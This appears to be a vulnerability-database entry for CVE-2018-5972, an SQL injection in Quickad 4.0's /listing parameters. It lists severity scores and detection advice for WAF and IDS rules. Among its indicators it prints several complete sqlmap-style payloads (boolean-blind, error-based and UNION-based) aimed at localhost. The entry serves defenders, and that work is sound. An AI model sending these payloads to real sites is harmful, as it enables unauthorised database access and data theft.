CVE-2018-5972
published 2018-01-24CVE-2018-5972: SQL Injection exists in Classified Ads CMS Quickad 4.0 via the keywords, placeid, cat, or subcat parameter to the listing URI.
PriorityP271critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
19.49%
97.0th percentile
SQL Injection exists in Classified Ads CMS Quickad 4.0 via the keywords, placeid, cat, or subcat parameter to the listing URI.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| quickad_project | quickad | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlhttp://localhost/[PATH]/listing?keywords=[SQL]&location=All%20United%20States&placetype=country&placeid=231[SQL]&cat=[SQL]&subcat=5[SQL]&filter=&sort=Newest&Submit=↗
commandkeywords=a%' AND 1665=1665 AND '%'='&location=All United States&placetype=country&placeid=231&cat=&subcat=5&filter=&sort=Newest&Submit=↗
commandkeywords=a%' AND (SELECT 7944 FROM(SELECT COUNT(*),CONCAT(0x71706a7871,(SELECT (ELT(7944=7944,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND '%'='&location=All United States&placetype=country&placeid=231&cat=&subcat=5&filter=&sort=Newest&Submit=↗
commandkeywords=a&location=All United States&placetype=country&placeid=231') AND 1976=1976 AND ('lFmx'='lFmx&cat=&subcat=5&filter=&sort=Newest&Submit=↗
commandkeywords=a&location=All United States&placetype=country&placeid=231') AND (SELECT 3263 FROM(SELECT COUNT(*),CONCAT(0x71706a7871,(SELECT (ELT(3263=3263,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('psTy'='psTy&cat=&subcat=5&filter=&sort=Newest&Submit=↗
commandkeywords=a&location=All United States&placetype=country&placeid=231') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7871,0x465344587867724149544c5a556147787a5876737447595477725372556d4a576c786c50546d7667,0x716a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- IJTp&cat=&subcat=5&filter=&sort=Newest&Submit=↗
commandkeywords=a&location=All United States&placetype=country&placeid=231&cat=&subcat=5') AND 7923=7923 AND ('zhKR'='zhKR&filter=&sort=Newest&Submit=↗
commandkeywords=a&location=All United States&placetype=country&placeid=231&cat=&subcat=5') AND (SELECT 5797 FROM(SELECT COUNT(*),CONCAT(0x71706a7871,(SELECT (ELT(5797=5797,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('SvkR'='SvkR&filter=&sort=Newest&Submit=↗
commandkeywords=a&location=All United States&placetype=country&placeid=231&cat=&subcat=5') UNION ALL SELECT CONCAT(0x71706a7871,0x6d72485769576563544a7a73516f67797544477a67515556755054545146717253556e676e705a74,0x716a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- jcSO&filter=&sort=Newest&Submit=↗
commandkeywords=a&location=All United States&placetype=country&placeid=231&cat=' UNION ALL SELECT NULL,CONCAT(0x71706a7871,0x786a716b7066557459416e78454b506469534c61464f6d78664e434a49506c494b7a795243554556,0x716a6b6271),NULL-- gLLf&subcat=5&filter=&sort=Newest&Submit=↗
- →Monitor GET requests to the /listing endpoint for SQL injection patterns in the keywords, placeid, cat, and subcat parameters — specifically look for single-quote injection, UNION ALL SELECT, boolean-based blind payloads (AND <int>=<int>), and FLOOR(RAND(0)*2) error-based payloads. ↗
- →Detect the hex-encoded canary strings 0x71706a7871 and 0x716a6b6271 in HTTP query parameters — these are sqlmap-style bookend markers (qpjxq and qjkbq) used to delimit extracted data in UNION and error-based payloads. ↗
- →The UNION-based payloads against the placeid and subcat parameters use a 31-column projection (UNION ALL SELECT NULL x31). Alert on UNION ALL SELECT queries with large NULL column counts in URL parameters targeting /listing. ↗
- →The UNION-based payload against the cat parameter uses a 3-column projection. Alert on UNION ALL SELECT with 3 NULLs in the cat parameter of /listing requests. ↗
- →Error-based injection uses INFORMATION_SCHEMA.PLUGINS with GROUP BY and FLOOR(RAND(0)*2) — a classic MySQL >= 5.0 error-based technique. Detect this pattern in WAF/IDS rules on HTTP query strings. ↗
- →The keywords parameter injection uses a trailing wildcard-style quote bypass pattern (%' AND ... AND '%'=') — detect URL-encoded single quotes combined with AND clauses in the keywords GET parameter. ↗
- →The placeid and subcat parameters are injected with a closing parenthesis and single-quote pattern (') AND ...) — detect ') followed by SQL keywords in these parameters. ↗
- ·All proof-of-concept payloads target a local/development instance (localhost). In production, the host and [PATH] prefix will vary — detection rules must be host-agnostic and focus on the /listing URI path and parameter patterns. ↗
- ·The vulnerability is confirmed only against Quickad version 4.0. Other versions are not mentioned as affected. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
2018-01-24
Published